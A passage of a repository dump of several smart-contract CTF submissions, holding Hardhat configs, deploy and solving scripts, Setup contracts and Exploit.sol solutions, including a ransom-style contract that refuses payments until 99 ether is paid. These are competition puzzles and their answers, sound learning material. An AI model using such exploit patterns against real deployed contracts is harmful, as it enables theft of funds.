6 | 7 | #Hardhat files 8 | cache 9 | artifacts 10 | -------------------------------------------------------------------------------- /JustDravee/README.md: -------------------------------------------------------------------------------- 1 | # Sheerlocking 2 | Because... Why not just use sheer locking? 
=) 3 | 4 | ## Local Exploit Testing 5 | `npm run ctf-test` 6 | 7 | ## Goerli Deploy 8 | `npm run deploy` 9 | 10 | ## Deploy Info 11 | 12 | | Contract | Goerli | 13 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 14 | | SheerLocking.sol | [0xc7e13b9c94Eb3902Fa272E83Bb4D19392d09eF4d](https://goerli.etherscan.io/address/0xc7e13b9c94Eb3902Fa272E83Bb4D19392d09eF4d) | 15 | | Setup.sol | [0x1f5c09a7d6a9B30b43DDDAABD384425DEe0ADe91](https://goerli.etherscan.io/address/0x1f5c09a7d6a9B30b43DDDAABD384425DEe0ADe91) | 16 | -------------------------------------------------------------------------------- /JustDravee/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | import './SheerLocking.sol'; 4 | 5 | contract Exploit { 6 | constructor(SheerLocking instance) payable { 7 | // Only the 1st unSheerLock1 needs ether 8 | // For the solutions: just extract the full strings in each unSheerLock and look at which function parameters should be empty ("") or not. There are several solutions 9 | // There are several solutions for the last key, see Ethernaut's Gatekeeper 1 for more details (it's inspired from there) 10 | instance.unSheerLock1{value: 24725 wei}("Benedict"," Cumberbatch"," is"," the"," best", 0x1000000000002266); 11 | instance.unSheerLock2("",""," is nice too. 
I waited so long for season 4 :'( ","Jim Moriarty","", 0x1000000000002266); 12 | instance.unSheerLock3("The Woman"," is Missy/The Master",""," in Doctor"," Who", 0x1000000000002266); 13 | instance.unSheerLock4("","","John Watson had a role in Ali G (Ricky C) ","", "", 0x1000000000002266); 14 | instance.unSheerLock5("Henry Cavill:",""," Sherlock of Steel and Enola's"," big bro","", 0x1000000000002266); 15 | instance.unSheerLock6("Sir Arthur Conan Doyle"," died in 1930,",""," so copyright on Sherlock Holmes expired in 2000 in the UK", 0x1000000000002266); 16 | instance.unSheerLock7("Jonny Lee Miller"," and Lucy Liu",""," were a"," good team too!", 0x1000000000002266); 17 | // function attackChallenge() in Setup.sol is misleading on purpose 18 | // modifier onlyDeployer() isn't used on purpose to mislead 19 | // Several modifiers and variables aren't really used or are just copy-pasta as a bluff 20 | } 21 | } -------------------------------------------------------------------------------- /JustDravee/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | interface ISetup { 4 | event Deployed(address instance); 5 | 6 | function isSolved() external view returns (bool); 7 | } 8 | -------------------------------------------------------------------------------- /JustDravee/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | require("@nomiclabs/hardhat-etherscan"); 3 | require("dotenv").config(); 4 | 5 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 6 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ""; 7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 8 | 9 | // This is a sample Hardhat task. 
To learn how to create your own go to 10 | // https://hardhat.org/guides/create-task.html 11 | task("accounts", "Prints the list of accounts", async (taskArgs, hre) => { 12 | const accounts = await hre.ethers.getSigners(); 13 | 14 | for (const account of accounts) { 15 | console.log(account.address); 16 | } 17 | }); 18 | 19 | // You need to export an object to set up your config 20 | // Go to https://hardhat.org/config/ to learn more 21 | 22 | /** 23 | * @type import('hardhat/config').HardhatUserConfig 24 | */ 25 | module.exports = { 26 | solidity: "0.8.4", 27 | etherscan: { 28 | // Your API key for Etherscan 29 | // Obtain one at https://etherscan.io/ 30 | apiKey: ETHERSCAN_API, 31 | }, 32 | networks: { 33 | goerli: { 34 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 35 | gasPrice: 900000000000, 36 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 37 | }, 38 | }, 39 | }; 40 | -------------------------------------------------------------------------------- /JustDravee/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "sherlocked-ctf", 3 | "scripts": { 4 | "ctf-test": "npx hardhat run scripts/solving.js --show-stack-traces", 5 | "deploy": "npx hardhat run scripts/goerli/deploy.js --network goerli" 6 | }, 7 | "devDependencies": { 8 | "@nomiclabs/hardhat-ethers": "^2.0.4", 9 | "@nomiclabs/hardhat-waffle": "^2.0.2", 10 | "chai": "^4.3.6", 11 | "ethereum-waffle": "^3.4.0", 12 | "ethers": "^5.5.3", 13 | "hardhat": "^2.8.3" 14 | }, 15 | "dependencies": { 16 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 17 | "dotenv": "^14.3.2" 18 | } 19 | } -------------------------------------------------------------------------------- /JustDravee/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const hre = require("hardhat"); 3 | 4 | function sleep(seconds) { 5 | return new 
Promise((resolve) => setTimeout(resolve, seconds * 1000));
}

/**
 * Deploys Setup to the selected network, looks up the SheerLocking instance
 * that Setup created, logs both addresses, then submits both contracts for
 * Etherscan source verification.
 *
 * `ethers` is not imported in this script; presumably Hardhat provides it as a
 * global when the script is started through `hardhat run` (see package.json).
 */
async function main() {
  const setupFactory = await ethers.getContractFactory("Setup");
  const setup = await setupFactory.deploy();
  await setup.deployed();

  const instanceAddress = await setup.instance();
  const ctf = await ethers.getContractAt("SheerLocking", instanceAddress);

  console.log("Deployed setup to", setup.address);
  console.log("Deployed ctf to", ctf.address);

  // Give Etherscan time to index the new contracts before verifying.
  await sleep(300);

  // Verify Setup first, then the challenge instance (same order as before).
  for (const { address } of [setup, ctf]) {
    await hre.run("verify:verify", { address });
  }
}

main()
  .then(() => process.exit(0))
  .catch((err) => {
    console.error(err);
    process.exit(1);
  });
--------------------------------------------------------------------------------
/JustDravee/scripts/solving.js:
--------------------------------------------------------------------------------
const { parseEther } = require("ethers/lib/utils");

/**
 * Local check of the challenge: deploys Setup, prints isSolved(), deploys
 * Exploit against the SheerLocking instance with 1 ether attached, and prints
 * isSolved() again.
 */
async function main() {
  const setupFactory = await ethers.getContractFactory("Setup");
  const exploitFactory = await ethers.getContractFactory("Exploit");

  const setup = await setupFactory.deploy();
  const instanceAddress = await setup.instance();
  const ctf = await ethers.getContractAt("SheerLocking", instanceAddress);

  console.log("solved:", await setup.isSolved());

  // All the work happens in the Exploit constructor.
  await exploitFactory.deploy(ctf.address, { value: parseEther("1") });

  console.log("solved:", await setup.isSolved());
}

main()
  .then(() => process.exit(0))
  .catch((err) => {
    console.error(err);
    process.exit(1);
  });
--------------------------------------------------------------------------------
/KahanMajmudar/.gitignore:
--------------------------------------------------------------------------------
node_modules
.env
coverage
coverage.json
typechain

#Hardhat files
cache
artifacts 10 | -------------------------------------------------------------------------------- /KahanMajmudar/.prettierrc: -------------------------------------------------------------------------------- 1 | { 2 | "arrowParens": "always", 3 | "bracketSpacing": true, 4 | "endOfLine": "lf", 5 | "printWidth": 80, 6 | "semi": false, 7 | "singleQuote": true, 8 | "tabWidth": 4, 9 | "useTabs": true, 10 | "overrides": [ 11 | { 12 | "files": "*.sol", 13 | "options": { 14 | "printWidth": 80, 15 | "tabWidth": 4, 16 | "useTabs": false, 17 | "singleQuote": false, 18 | "bracketSpacing": false, 19 | "explicitTypes": "always" 20 | } 21 | } 22 | ] 23 | } -------------------------------------------------------------------------------- /KahanMajmudar/README.md: -------------------------------------------------------------------------------- 1 | # Basic Sample Hardhat Project 2 | 3 | This project demonstrates a basic Hardhat use case. It comes with a sample contract, a test for that contract, a sample script that deploys that contract, and an example of a task implementation, which simply lists the available accounts. 
4 | 5 | Try running some of the following tasks: 6 | 7 | ```shell 8 | npx hardhat accounts 9 | npx hardhat compile 10 | npx hardhat clean 11 | npx hardhat test 12 | npx hardhat node 13 | node scripts/sample-script.js 14 | npx hardhat help 15 | ``` 16 | -------------------------------------------------------------------------------- /KahanMajmudar/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity 0.8.4; 3 | 4 | import "./CustomMarketplace.sol"; 5 | 6 | contract Exploit { 7 | bool internal ransomEnabled = true; 8 | 9 | constructor(CustomMarketplace instance) {} 10 | 11 | function finalize() public payable { 12 | if (msg.value >= 99 ether) { 13 | ransomEnabled = false; 14 | } 15 | } 16 | 17 | fallback() external payable { 18 | require(!ransomEnabled); 19 | } 20 | 21 | receive() external payable { 22 | require(!ransomEnabled); 23 | } 24 | 25 | function isRansomPaid() external view returns (bool) { 26 | return !ransomEnabled; 27 | } 28 | 29 | function getBalance() public view returns (uint256) { 30 | return address(this).balance; 31 | } 32 | } 33 | -------------------------------------------------------------------------------- /KahanMajmudar/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity 0.8.4; 3 | 4 | interface ISetup { 5 | event Deployed(address instance); 6 | 7 | function isSolved() external view returns (bool); 8 | } 9 | -------------------------------------------------------------------------------- /KahanMajmudar/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity 0.8.4; 3 | 4 | import "./ISetup.sol"; 5 | import "./CustomMarketplace.sol"; 6 | import "./Exploit.sol"; 7 | 8 | contract Setup is ISetup { 9 | 
CustomMarketplace public instance; 10 | Exploit public exploit; 11 | 12 | constructor() { 13 | instance = new CustomMarketplace(); 14 | exploit = new Exploit(instance); 15 | 16 | emit Deployed(address(instance)); 17 | 18 | instance.createNFTAndPutOnSale("ipfs://", 5000, 1e18); 19 | instance.updateInfo(1, address(exploit), 5000, 1e18); 20 | } 21 | 22 | function isSolved() external view override returns (bool) { 23 | return exploit.isRansomPaid(); 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /KahanMajmudar/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require('@nomiclabs/hardhat-waffle') 2 | require('@nomiclabs/hardhat-etherscan') 3 | require('dotenv').config() 4 | 5 | const ETHERSCAN_API = process.env.ETHERSCAN_API || '' 6 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || '' 7 | const PRIVATE_KEY = process.env.PRIVATE_KEY || '' 8 | 9 | // This is a sample Hardhat task. 
To learn how to create your own go to 10 | // https://hardhat.org/guides/create-task.html 11 | task('accounts', 'Prints the list of accounts', async (taskArgs, hre) => { 12 | const accounts = await hre.ethers.getSigners() 13 | 14 | for (const account of accounts) { 15 | console.log(account.address) 16 | } 17 | }) 18 | 19 | // You need to export an object to set up your config 20 | // Go to https://hardhat.org/config/ to learn more 21 | 22 | /** 23 | * @type import('hardhat/config').HardhatUserConfig 24 | */ 25 | module.exports = { 26 | solidity: '0.8.4', 27 | etherscan: { 28 | // Your API key for Etherscan 29 | // Obtain one at https://etherscan.io/ 30 | apiKey: ETHERSCAN_API, 31 | }, 32 | networks: { 33 | goerli: { 34 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 35 | gasPrice: 900000000000, 36 | accounts: [PRIVATE_KEY].filter((item) => item !== ''), 37 | }, 38 | }, 39 | } 40 | -------------------------------------------------------------------------------- /KahanMajmudar/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "hardhat-project", 3 | "scripts": { 4 | "compile": "npx hardhat compile", 5 | "clean": "rm -rf artifacts/ cache/" 6 | }, 7 | "devDependencies": { 8 | "@nomiclabs/hardhat-ethers": "^2.0.5", 9 | "@nomiclabs/hardhat-etherscan": "^3.0.1", 10 | "@nomiclabs/hardhat-waffle": "^2.0.2", 11 | "chai": "^4.3.6", 12 | "dotenv": "^16.0.0", 13 | "ethereum-waffle": "^3.4.0", 14 | "ethers": "^5.5.4", 15 | "hardhat": "^2.8.4", 16 | "prettier-plugin-solidity": "^1.0.0-beta.19" 17 | }, 18 | "dependencies": { 19 | "@openzeppelin/contracts": "^4.5.0" 20 | } 21 | } -------------------------------------------------------------------------------- /KahanMajmudar/scripts/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require('ethers/lib/utils') 2 | const hre = require('hardhat') 3 | 4 | function sleep(seconds) { 5 | 
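return new Promise((resolve) => setTimeout(resolve, seconds * 1000))
}

/**
 * Deploys Setup, resolves the CustomMarketplace instance it created, logs both
 * addresses, waits for Etherscan to index them, then submits both contracts to
 * the `verify:verify` task.
 *
 * `ethers` is not imported in this script; presumably Hardhat provides it as a
 * global when the script is started through `hardhat run`.
 */
async function main() {
	const SETUP = await ethers.getContractFactory('Setup')

	const setup = await SETUP.deploy()
	await setup.deployed()

	const ctf = await ethers.getContractAt(
		'CustomMarketplace',
		await setup.instance()
	)

	console.log('Deployed setup to', setup.address)
	console.log('Deployed ctf to', ctf.address)

	// wait for etherscan to index
	await sleep(300)

	// verify
	// (This line was a bare `verify` identifier. Nothing in this script defines
	// it, so it would throw a ReferenceError after the contracts were already
	// deployed and the wait had elapsed, and neither contract would be verified.)
	await hre.run('verify:verify', {
		address: setup.address,
	})
	await hre.run('verify:verify', {
		address: ctf.address,
	})
}

// Exit non-zero on any failure so callers and CI can detect a broken deploy.
main()
	.then(() => process.exit(0))
	.catch((error) => {
		console.error(error)
		process.exit(1)
	})
--------------------------------------------------------------------------------
/KahanMajmudar/scripts/solving.js:
--------------------------------------------------------------------------------
const { parseEther } = require('ethers/lib/utils')

/**
 * Local check of the challenge: deploys Setup, prints isSolved(), calls
 * finalize() with 99 ether on the Exploit contract that Setup itself deployed
 * (read back through setup.exploit()), and prints isSolved() again.
 */
async function main() {
	const SETUP = await ethers.getContractFactory('Setup')
	const EXPLOIT = await ethers.getContractFactory('Exploit')

	const setup = await SETUP.deploy()

	console.log('before exploit: solved:', await setup.isSolved())

	const exploit = await ethers.getContractAt('Exploit', await setup.exploit())
	await exploit.finalize({ value: parseEther('99') })

	console.log('after exploit: solved:', await setup.isSolved())
}

main()
	.then(() => process.exit(0))
	.catch((error) => {
		console.error(error)
		process.exit(1)
	})
--------------------------------------------------------------------------------
/PeterisPrieditis/.gitignore:
--------------------------------------------------------------------------------
/node_modules
.env

#Hardhat files
cache
artifacts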
-------------------------------------------------------------------------------- /PeterisPrieditis/README.md: -------------------------------------------------------------------------------- 1 | # Sherlock x Secureum CTF submission 2 | 3 | Kick-off presentation: https://docs.google.com/presentation/d/1f_SFUs9nP9LMgxUETO07SW3h-vz9fxagFw_Tq9JZ9qM/edit?usp=sharing 4 | 5 | > Don't deploy the solution (`Exploit.sol`) to a public chain! 6 | 7 | | Contract | Goerli | 8 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 9 | | StableSwap2.sol | [0x94f12A6fb7D9B0cBBc43CdDC6A4827649f757c72](https://goerli.etherscan.io/address/0x94f12A6fb7D9B0cBBc43CdDC6A4827649f757c72) | 10 | | Setup.sol | [0x64A9fcaD8D299aF9B1a96dA17458c0b3D876b687 ](https://goerli.etherscan.io/address/0x64A9fcaD8D299aF9B1a96dA17458c0b3D876b687) | 11 | 12 | `.env` file 13 | 14 | ``` 15 | ETHERSCAN_API= 16 | ALCHEMY_API_KEY_GOERLI= 17 | PRIVATE_KEY= 18 | ``` -------------------------------------------------------------------------------- /PeterisPrieditis/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity 0.8.0; 3 | 4 | interface ISetup { 5 | event Deployed(address instance); 6 | 7 | function isSolved() external view returns (bool); 8 | } 9 | -------------------------------------------------------------------------------- /PeterisPrieditis/contracts/test/TestERC20.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: UNLICENSED 2 | pragma solidity 0.8.0; 3 | 4 | import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol"; 5 | 6 | contract TestERC20 is ERC20 { 7 | constructor( 8 | string memory name_, 9 | string memory symbol_, 10 | uint256 amount 11 | ) ERC20(name_, symbol_) { 12 | _mint(msg.sender, amount); 13 | } 14 | } 
--------------------------------------------------------------------------------
/PeterisPrieditis/hardhat.config.js:
--------------------------------------------------------------------------------
// Hardhat configuration for the challenge: compiler version, Etherscan
// verification key and the goerli network used by scripts/goerli/deploy.js.
require("@nomiclabs/hardhat-waffle");
require("@nomiclabs/hardhat-etherscan");
// Loads the local .env file into process.env. This project's .gitignore lists
// .env, which keeps the three secrets below out of version control.
require("dotenv").config();

// Each value falls back to "" when the variable is unset, so the config still
// loads for purely local runs (compile, scripts/solving.js).
const ETHERSCAN_API = process.env.ETHERSCAN_API || "";
const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || "";
// Signing key of the deploying account. Keep it only in the untracked .env and
// prefer a throwaway testnet-only key.
const PRIVATE_KEY = process.env.PRIVATE_KEY || "";

// This is a sample Hardhat task. To learn how to create your own go to
// https://hardhat.org/guides/create-task.html
// Prints only the address of each configured signer, never key material.
task("accounts", "Prints the list of accounts", async (taskArgs, hre) => {
  const accounts = await hre.ethers.getSigners();

  for (const account of accounts) {
    console.log(account.address);
  }
});

// You need to export an object to set up your config
// Go to https://hardhat.org/config/ to learn more

/**
 * @type import('hardhat/config').HardhatUserConfig
 */
module.exports = {
  solidity: {
    compilers: [
      {
        version: "0.8.0"
      }
    ]
  },
  etherscan: {
    // Your API key for Etherscan
    // Obtain one at https://etherscan.io/
    apiKey: ETHERSCAN_API,
  },
  networks: {
    goerli: {
      // The Alchemy key is embedded in the RPC URL, so the resolved URL is
      // itself a secret: avoid printing the network config in shared logs.
      url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`,
      //gasPrice: 900000000000,
      // Dropping the "" placeholder leaves an empty accounts list when
      // PRIVATE_KEY is unset, instead of passing an invalid key to Hardhat.
      accounts: [PRIVATE_KEY].filter((item) => item !== ""),
    },
  },
};
--------------------------------------------------------------------------------
/PeterisPrieditis/package.json:
--------------------------------------------------------------------------------
{
  "name": "sherlock-ctf-0x0-PeterisPrieditis",
  "devDependencies": {
    "hardhat": "^2.8.4",
    "@nomiclabs/hardhat-ethers": "^2.0.4",
    "@nomiclabs/hardhat-waffle": "^2.0.2",
    "chai": "^4.3.6",
    "ethereum-waffle": "^3.4.0",
    "ethers": 
"^5.5.3" 10 | }, 11 | "dependencies": { 12 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 13 | "dotenv": "^14.3.2", 14 | "@openzeppelin/contracts": "^4.5.0" 15 | } 16 | } -------------------------------------------------------------------------------- /PeterisPrieditis/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | //npx hardhat run --network goerli scripts/goerli/deploy.js 2 | 3 | const { parseEther } = require("ethers/lib/utils"); 4 | const hre = require("hardhat"); 5 | 6 | function sleep(seconds) { 7 | return new Promise((resolve) => setTimeout(resolve, seconds * 1000)); 8 | } 9 | 10 | async function main() { 11 | const SETUP = await ethers.getContractFactory("Setup"); 12 | 13 | const setup = await SETUP.deploy({ value: parseEther("0.0000374") }); 14 | await setup.deployed(); 15 | 16 | const ctf = await ethers.getContractAt( 17 | "StableSwap2", 18 | await setup.instance() 19 | ); 20 | 21 | console.log("Deployed setup to", setup.address); 22 | console.log("Deployed ctf to", ctf.address); 23 | 24 | // wait for etherscan to index 25 | await sleep(300); 26 | 27 | // verify 28 | await hre.run("verify:verify", { 29 | address: setup.address, 30 | }); 31 | await hre.run("verify:verify", { 32 | address: ctf.address, 33 | }); 34 | } 35 | 36 | main() 37 | .then(() => process.exit(0)) 38 | .catch((error) => { 39 | console.error(error); 40 | process.exit(1); 41 | }); 42 | -------------------------------------------------------------------------------- /PeterisPrieditis/scripts/solving.js: -------------------------------------------------------------------------------- 1 | //npx hardhat compile 2 | //npx hardhat run scripts/solving.js 3 | 4 | const hre = require("hardhat"); 5 | const ethers = hre.ethers; 6 | const { parseEther } = require("ethers/lib/utils"); 7 | 8 | async function main() { 9 | const SETUP = await ethers.getContractFactory("Setup"); 10 | const EXPLOIT = await ethers.getContractFactory("Exploit"); 11 
| 12 | const setup = await SETUP.deploy({ value: parseEther("0.0000374") }); 13 | const ctf = await ethers.getContractAt( 14 | "StableSwap2", 15 | await setup.instance() 16 | ); 17 | 18 | console.log("Before exploit - solved:", await setup.isSolved()); 19 | 20 | await EXPLOIT.deploy(ctf.address); 21 | 22 | console.log("After exploit - solved:", await setup.isSolved()); 23 | } 24 | 25 | main() 26 | .then(() => process.exit(0)) 27 | .catch((error) => { 28 | console.error(error); 29 | process.exit(1); 30 | }); -------------------------------------------------------------------------------- /RomiRand/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules/ 2 | cache/ 3 | artifacts/ 4 | .vscode/ 5 | docgen/ 6 | 7 | .env 8 | -------------------------------------------------------------------------------- /RomiRand/README.md: -------------------------------------------------------------------------------- 1 | # CTF submission 2 | 3 | 4 | | Contract | Goerli | 5 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 6 | | Unbreakable.sol | [0x3dc21F58F3b77aDD4AD5D40992C0B431bdFFc6B8](https://goerli.etherscan.io/address/0x3dc21F58F3b77aDD4AD5D40992C0B431bdFFc6B8) | 7 | | Setup.sol | [0x85CCd0c58Fe07DC6716f1EfCcAba0164b97ae66B](https://goerli.etherscan.io/address/0x85CCd0c58Fe07DC6716f1EfCcAba0164b97ae66B) | 8 | 9 | 10 | 11 | Let's hope there are no more mistakes. 12 | 13 | I wonder if it's easy/hard compared to the others. 14 | It's a lot of fun, thanks for doing this! 
-------------------------------------------------------------------------------- /RomiRand/contracts/ISetup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.11; 3 | 4 | interface ISetup { 5 | event Deployed(address instance); 6 | 7 | function isSolved() external view returns (bool); 8 | } 9 | -------------------------------------------------------------------------------- /RomiRand/contracts/Setup.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: MIT 2 | pragma solidity 0.8.11; 3 | 4 | import './ISetup.sol'; 5 | import './Unbreakable.sol'; 6 | import "@openzeppelin/contracts/utils/Address.sol"; 7 | 8 | contract Setup is ISetup { 9 | Unbreakable public instance; 10 | 11 | constructor() { 12 | instance = new Unbreakable(); 13 | emit Deployed(address(instance)); 14 | } 15 | 16 | function isSolved() external override view returns (bool) { 17 | return !Address.isContract(address(instance)); 18 | } 19 | } -------------------------------------------------------------------------------- /RomiRand/hardhat.config.js: -------------------------------------------------------------------------------- 1 | require("@nomiclabs/hardhat-waffle"); 2 | require("@nomiclabs/hardhat-etherscan"); 3 | require("dotenv").config(); 4 | require('hardhat-docgen'); 5 | 6 | const ETHERSCAN_API = process.env.ETHERSCAN_API || ""; 7 | const ALCHEMY_API_KEY_GOERLI = process.env.ALCHEMY_API_KEY_GOERLI || ""; 8 | const PRIVATE_KEY = process.env.PRIVATE_KEY || ""; 9 | 10 | // This is a sample Hardhat task. 
To learn how to create your own go to 11 | // https://hardhat.org/guides/create-task.html 12 | task("accounts", "Prints the list of accounts", async (taskArgs, hre) => { 13 | const accounts = await hre.ethers.getSigners(); 14 | 15 | for (const account of accounts) { 16 | console.log(account.address); 17 | } 18 | }); 19 | 20 | // You need to export an object to set up your config 21 | // Go to https://hardhat.org/config/ to learn more 22 | 23 | /** 24 | * @type import('hardhat/config').HardhatUserConfig 25 | */ 26 | module.exports = { 27 | solidity: "0.8.11", 28 | etherscan: { 29 | // Your API key for Etherscan 30 | // Obtain one at https://etherscan.io/ 31 | apiKey: ETHERSCAN_API, 32 | }, 33 | networks: { 34 | goerli: { 35 | url: `https://eth-goerli.alchemyapi.io/v2/${ALCHEMY_API_KEY_GOERLI}`, 36 | gasPrice: 900000000000, 37 | accounts: [PRIVATE_KEY].filter((item) => item !== ""), 38 | }, 39 | }, 40 | }; 41 | -------------------------------------------------------------------------------- /RomiRand/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "hardhat-project", 3 | "devDependencies": { 4 | "@nomiclabs/hardhat-ethers": "^2.0.4", 5 | "@nomiclabs/hardhat-waffle": "^2.0.2", 6 | "chai": "^4.3.6", 7 | "ethereum-waffle": "^3.4.0", 8 | "ethers": "^5.5.3", 9 | "hardhat": "^2.8.3" 10 | }, 11 | "dependencies": { 12 | "@nomiclabs/hardhat-etherscan": "^3.0.0", 13 | "@openzeppelin/contracts": "^4.4.2", 14 | "dotenv": "^14.3.2", 15 | "hardhat-docgen": "^1.3.0", 16 | "hardhat-gas-reporter": "^1.0.7", 17 | "solidity-code-metrics": "^0.0.19" 18 | } 19 | } 20 | -------------------------------------------------------------------------------- /RomiRand/scripts/goerli/deploy.js: -------------------------------------------------------------------------------- 1 | const { parseEther } = require("ethers/lib/utils"); 2 | const hre = require("hardhat"); 3 | 4 | function sleep(seconds) { 5 | return new Promise((resolve) => 
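setTimeout(resolve, seconds * 1000));
}

/**
 * Deploys Setup, resolves the Unbreakable instance it created, logs both
 * addresses, waits for Etherscan to index them, then submits both contracts to
 * the `verify:verify` task.
 *
 * `ethers` is not imported in this script; presumably Hardhat provides it as a
 * global when the script is started through `hardhat run`.
 */
async function main() {
  const SETUP = await ethers.getContractFactory("Setup");

  const setup = await SETUP.deploy();
  await setup.deployed();

  const ctf = await ethers.getContractAt(
    "Unbreakable",
    await setup.instance()
  );

  console.log("Deployed setup to", setup.address);
  console.log("Deployed ctf to", ctf.address);

  // wait for etherscan to index
  await sleep(300);

  // verify
  await hre.run("verify:verify", {
    address: setup.address,
  });
  await hre.run("verify:verify", {
    address: ctf.address,
  });
}

// Exit non-zero on any failure so callers and CI can detect a broken deploy.
main()
  .then(() => process.exit(0))
  .catch((error) => {
    console.error(error);
    process.exit(1);
  });
--------------------------------------------------------------------------------
/RomiRand/scripts/solving.js:
--------------------------------------------------------------------------------
const { parseEther } = require("ethers/lib/utils");

/**
 * Local check of the challenge: deploys Setup, prints isSolved(), deploys
 * Exploit against the Unbreakable instance, calls its finalize(), and prints
 * isSolved() again.
 */
async function main() {
  // const [owner, attacker, addr2] = await ethers.getSigners();
  const SETUP = await ethers.getContractFactory("Setup");
  const EXPLOIT = await ethers.getContractFactory("Exploit");

  const setup = await SETUP.deploy();
  const ctf = await ethers.getContractAt(
    "Unbreakable",
    await setup.instance()
  );

  console.log("solved:", await setup.isSolved());
  // Declared with const: the original assigned to an undeclared `exploit`,
  // which creates an implicit global and throws under strict mode.
  const exploit = await EXPLOIT.deploy(ctf.address);
  await exploit.finalize();
  console.log("solved:", await setup.isSolved());
}

main()
  .then(() => process.exit(0))
  .catch((error) => {
    console.error(error);
    process.exit(1);
  });
--------------------------------------------------------------------------------
/Thro77le/README.md:
--------------------------------------------------------------------------------
# sherlock-ctf-0x0-Thro77le


| Contract | 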
Goerli | 5 | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------------- | 6 | | Setup.sol | [0xBF3e5530aB7Dcba712E3A7fA99463d46eb6a0c8e](https://goerli.etherscan.io/address/0xBF3e5530aB7Dcba712E3A7fA99463d46eb6a0c8e) | 7 | | Challenge.sol | [0xd9C72eD9DdeF04D0Ab88aE2403C383Ffbd11a71c](https://goerli.etherscan.io/address/0xd9C72eD9DdeF04D0Ab88aE2403C383Ffbd11a71c) | 8 | -------------------------------------------------------------------------------- /Thro77le/contracts/Challenge.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | 4 | interface IFactory { 5 | function createContract(bytes memory bytecode, uint salt) external returns (bool); 6 | } 7 | 8 | contract Challenge { 9 | bool public isSolved; 10 | IFactory factory; 11 | 12 | constructor(address _factory) { 13 | factory = IFactory(_factory); 14 | } 15 | 16 | function createContract(bytes memory bytecode, uint salt) public { 17 | isSolved = factory.createContract(bytecode, salt); 18 | } 19 | } -------------------------------------------------------------------------------- /Thro77le/contracts/Dummy.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | // Attack should be handled by EOA 4 | // See sherlock.test.ts file for solution 5 | 6 | contract Dummy { 7 | uint256 dummy; 8 | 9 | function dummy_function() public { 10 | dummy++; 11 | } 12 | } -------------------------------------------------------------------------------- /Thro77le/contracts/Exploit.sol: -------------------------------------------------------------------------------- 1 | // Attack should be handled off-chain, preferably by EOA 2 | // See sherlock.test.ts file for solution 3 | 4 | // This on-chain solution has precomputed correct answer 5 | // It's purpose is to adhere to CTF's interface 6 | 7 | pragma solidity 0.8.4; 8 
| 9 | interface IChallenge { 10 | function createContract(bytes memory bytecode, uint salt) external; 11 | } 12 | 13 | interface ISetup { 14 | function isSolved() external view returns (bool); 15 | } 16 | 17 | contract Exploit { 18 | address challenge; 19 | address setup; 20 | 21 | 22 | constructor(address _challenge, address _setup) { 23 | challenge = _challenge; 24 | setup = _setup; 25 | 26 | bytes memory bytecode = hex'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'; 27 | uint256 salt = 23167279743460724461247717006863355784470130553221099219428282400133720571904; 28 | 29 | IChallenge(challenge).createContract(bytecode, salt); 30 | 31 | require(ISetup(setup).isSolved(), "Exploit failed"); 32 | } 33 | } -------------------------------------------------------------------------------- /Thro77le/contracts/Factory.sol: -------------------------------------------------------------------------------- 1 | pragma solidity 0.8.4; 2 | 3 | contract Factory { 4 | function createContract(bytes memory bytecode, uint salt) public returns (bool) { 5 | address addr; 6 | assembly { 7 | addr := create2(0, add(bytecode, 0x20), mload(bytecode), salt) 8 | if iszero(extcodesize(addr)) { 9 | revert(0, 0) 10 | } 11 | } 12 | require(isForbidden(addr), "Only Forbidden Contracts"); 13 | require(isFunded(addr), "Only Funded Contracts"); 14 | return true; 15 | } 16 | 17 | function isForbidden(address _addr) internal view returns (bool) { 18 | bytes20 addr = bytes20(_addr); 19 | bytes20 id = hex"00000000000000000000000000000000000f0b1d"; 20 | bytes20 mask = 